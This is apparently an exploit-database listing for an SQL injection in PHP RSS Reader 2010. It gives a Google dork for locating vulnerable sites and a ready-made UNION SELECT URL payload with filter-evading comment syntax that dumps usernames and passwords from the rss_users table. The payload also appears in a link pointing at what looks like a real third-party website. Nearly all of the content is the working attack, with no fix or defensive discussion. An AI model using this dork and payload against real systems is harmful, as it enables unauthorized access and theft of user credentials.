PHP RSS Reader 2010 - SQL Injection



EKU-ID: 34436 CVE: OSVDB-99594 OSVDB-ID:
Author: mishal abdullah Published: 2013-10-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: [PHP RSS READER 2010 SQLI]
# Google Dork: [Copyright 2010 - Powered By - PHP RSS Reader]
# Date: [28/10/2013]
# Exploit Author: [rDNix]
# Vendor Homepage: [http://www.phprssreader.com/]
# Version: [2010]

Exploit :-

http://www.site.com/[phprssreader]/null'%20/*!uNION*/%20/*!select*/%201,2,3,/*!concat(username,password)*/,5,6,7,8,9,10,11%20from%20rss_users--+<http://www.kt.com.kw/read2/null'%20/*!uNION*/%20/*!select*/%201,2,3,/*!concat(username,password)*/,5,6,7,8,9,10,11%20from%20rss_users--+>


By : rDNix
Contact : Mynamemishal@gmail.com